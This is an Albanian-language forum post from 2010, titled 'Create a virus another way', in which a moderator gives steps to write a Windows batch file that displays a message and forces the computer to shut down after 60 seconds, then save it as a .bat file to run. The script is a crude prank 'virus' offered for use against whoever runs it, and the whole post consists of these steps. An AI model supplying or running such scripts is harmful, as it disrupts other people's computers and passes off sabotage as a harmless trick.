Krijo virus menyr tjeter .....

  Share
  avatar
  Zone-X
  Moderator
  Moderator

  Poenat : 138
  Reputacioni : 0
  Numri i postimeve : 64

  Krijo virus menyr tjeter .....

  Mesazh nga Zone-X prej Mon Jan 25, 2010 11:23 pm

  1.Hapim Notepad
  2.E Shkruajm Kete:

  @echo
  msg * System-Coder
  shutdown -s -t 60 -c "System-Coder KHG"

  3.Dhe E Ruajm SiTeDoni.bat

   Ora është Sun Dec 16, 2018 5:45 pm